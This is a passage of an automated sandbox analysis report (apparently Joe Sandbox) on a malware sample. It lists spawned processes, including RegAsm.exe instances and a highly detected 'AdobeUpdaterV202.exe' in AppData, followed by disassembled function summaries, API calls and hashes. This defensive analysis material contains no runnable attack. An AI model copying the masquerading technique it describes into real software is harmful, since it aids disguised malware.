Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	18:22:03
Start date:	23/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xc80000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	18:22:03
Start date:	23/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xad0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	18:22:05
Start date:	23/05/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3108 -s 2688
Imagebase:	0x7d0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	18:22:12
Start date:	23/05/2024
Path:	C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe"
Imagebase:	0xe90000
File size:	468'480 bytes
MD5 hash:	F14B083F53FEFD0071732BF5C0DCD6FA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 45%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	18:22:12
Start date:	23/05/2024
Path:	C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe"
Imagebase:	0xe90000
File size:	468'480 bytes
MD5 hash:	F14B083F53FEFD0071732BF5C0DCD6FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	18:22:12
Start date:	23/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xef0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	18:22:20
Start date:	23/05/2024
Path:	C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe"
Imagebase:	0xe90000
File size:	468'480 bytes
MD5 hash:	F14B083F53FEFD0071732BF5C0DCD6FA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	18:22:20
Start date:	23/05/2024
Path:	C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe"
Imagebase:	0xe90000
File size:	468'480 bytes
MD5 hash:	F14B083F53FEFD0071732BF5C0DCD6FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	18:22:20
Start date:	23/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x710000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	12.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	23.7%
Total number of Nodes:	1394
Total number of Limit Nodes:	36

Executed Functions

Function 0082B8E0 Relevance: 46.4, APIs: 27, Instructions: 5861COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNEL32(?,00000000), ref: 0082BA08
CreateDirectoryA.KERNEL32(?,00000000), ref: 0082BAD2
CreateDirectoryA.KERNEL32(?,00000000), ref: 0082C575
CreateDirectoryA.KERNEL32(?,00000000), ref: 0082D29A
CreateDirectoryA.KERNEL32(?,00000000), ref: 0082D6F8
CreateDirectoryA.KERNEL32(?,00000000), ref: 0082DAD7
CreateDirectoryA.KERNEL32(?,00000000), ref: 0082DF3C
CreateDirectoryA.KERNEL32(?,00000000), ref: 0082E6FA
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0082EEEA
CreateDirectoryA.KERNEL32(?,00000000), ref: 0082F45B
CreateDirectoryA.KERNEL32(?,00000000), ref: 0082F525
CreateDirectoryA.KERNEL32(?,00000000), ref: 0082FC55
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 008301ED
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00830580
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0083088D
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00830B14
CreateDirectoryA.KERNEL32(?,00000000), ref: 00830F12
CreateDirectoryA.KERNEL32(?,00000000), ref: 00831904
CreateDirectoryA.KERNEL32(?,00000000), ref: 00831E6E
CreateDirectoryA.KERNEL32(?,00000000), ref: 00831FBE
CreateDirectoryA.KERNEL32(?,00000000), ref: 0082FEF1

Part of subcall function 00906770: GetLastError.KERNEL32(00000000,?,00000080,?,?,009A94F8,?,?,?,00985B0C,00000001,?,009A94F8,?,?), ref: 00906B20

CreateDirectoryA.KERNEL32(?,00000000), ref: 0082F933

Part of subcall function 00906770: std::_Throw_Cpp_error.LIBCPMT ref: 00906BE7
Part of subcall function 00906770: std::_Throw_Cpp_error.LIBCPMT ref: 00906BF8

Part of subcall function 00906CA0: std::_Throw_Cpp_error.LIBCPMT ref: 00906D4F
Part of subcall function 00906CA0: std::_Throw_Cpp_error.LIBCPMT ref: 00906D60

SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0082BB07

Part of subcall function 00906CA0: GetLastError.KERNEL32(?,?,?,00000006,00000005,00000005), ref: 00906D07

CreateDirectoryA.KERNEL32(?,00000000), ref: 0082BD08
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0082BD37
CreateDirectoryA.KERNEL32(?,00000000), ref: 0082C0CC
CreateDirectoryA.KERNEL32(?,00000000), ref: 0082C196

Memory Dump Source

Source File: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true

Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd

Similarity

API ID: CreateDirectory$Cpp_errorThrow_std::_$ErrorFolderLastPath
String ID:
API String ID: 2071525408-0
Opcode ID: 916b3f0a3fb4773f4bf3a1ee9a2a1ff1e91fbd91dbc9470062b85aaf1dce438d
Instruction ID: 09264c5873efab170a5190d380758e7630e5e7f2fc74c5498ef04e5161362b8e
Opcode Fuzzy Hash: 916b3f0a3fb4773f4bf3a1ee9a2a1ff1e91fbd91dbc9470062b85aaf1dce438d
Instruction Fuzzy Hash: 75F3CEB4D0426D8BDF25CF98D991AEEBBB0BF58300F1041A9D849B7341DB345A85CFA6

Function 008A1C10 Relevance: 21.5, APIs: 7, Strings: 4, Instructions: 2202COMMON

Download Yara Rule

APIs

Part of subcall function 00906CA0: GetLastError.KERNEL32(?,?,?,00000006,00000005,00000005), ref: 00906D07

SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?), ref: 008A27AB
SHGetFolderPathA.SHELL32(00000000,00000005,00000000,00000000,?,?,?,?,?,?,?,?), ref: 008A2AA7
SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 008A2DA5
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 008A3105
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 008A3433
SHGetFolderPathA.SHELL32(00000000,00000008,00000000,00000000,?), ref: 008A3737
Concurrency::cancel_current_task.LIBCPMT ref: 008A44E1

Strings

type must be boolean, but is , xrefs: 008A4507
cannot get value, xrefs: 008A445E, 008A4598
type must be string, but is , xrefs: 008A455B
cannot compare iterators of different containers, xrefs: 008A449D

Memory Dump Source

Source File: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true

Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd

Similarity

API ID: FolderPath$Concurrency::cancel_current_taskErrorLast
String ID: cannot compare iterators of different containers$cannot get value$type must be boolean, but is $type must be string, but is
API String ID: 1377278223-2698695959
Opcode ID: 0902736a9f2d1dea34e5be634380547a4dc23601677137a7051795bf31b70392
Instruction ID: 2df43f7ebf9bd5f5c3dc008fa6f0f5cf357a6ae64ef09fcbf1064d8299908152
Opcode Fuzzy Hash: 0902736a9f2d1dea34e5be634380547a4dc23601677137a7051795bf31b70392
Instruction Fuzzy Hash: 524302B0D052688BDB25CF28C894BEDBBB5FF59304F1082D9D849A7281EB756B84CF51

Function 008BF0D0 Relevance: 15.4, APIs: 3, Strings: 4, Instructions: 3172COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,?,?), ref: 008BF224
CreateDirectoryA.KERNEL32(?,00000000,00000000), ref: 008C1C76

Part of subcall function 00906CA0: GetLastError.KERNEL32(?,?,?,00000006,00000005,00000005), ref: 00906D07

CreateDirectoryA.KERNEL32(?,00000000,?,?,?,?,00000000), ref: 008C1F5D

Strings

~]d, xrefs: 008BFAC6
;Yb., xrefs: 008BFC4C
cannot use push_back() with , xrefs: 008C3518
cannot use operator[] with a string argument with , xrefs: 008C3571, 008C35C6

Memory Dump Source

Source File: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true

Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd

Similarity

API ID: CreateDirectory$ErrorFolderLastPath
String ID: ;Yb.$cannot use operator[] with a string argument with $cannot use push_back() with $~]d
API String ID: 3244528402-1763774129
Opcode ID: a0476902ff16c754061a73c854f984500ff22a612150405d7c2c66026751d782
Instruction ID: 8ecf44c077716dd5aa063707fdc91eb052cb1cfc83dbcedac2d0bff1828b0943
Opcode Fuzzy Hash: a0476902ff16c754061a73c854f984500ff22a612150405d7c2c66026751d782
Instruction Fuzzy Hash: 0F93DDB4D052688ADB65CF28C991BEDBBB1BF59300F1081EAD84DA7241DB746BC4CF46

Function 0091AD00 Relevance: 9.2, Strings: 7, Instructions: 484
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

sqlite_rename_table, xrefs: 0091B0E4
MATCH, xrefs: 0091B108, 0091B119, 0091B139, 0091B13A, 0091B150
NOCASE, xrefs: 0091B02A
automatic extension loading failed: %s, xrefs: 0091B22C
no such vfs: %s, xrefs: 0091AEB7
BINARY, xrefs: 0091AF25, 0091AF34, 0091AF4E, 0091AF8E, 0091AF99, 0091AFB1, 0091B003, 0091B004
RTRIM, xrefs: 0091AF68

Memory Dump Source

Source File: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true

Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
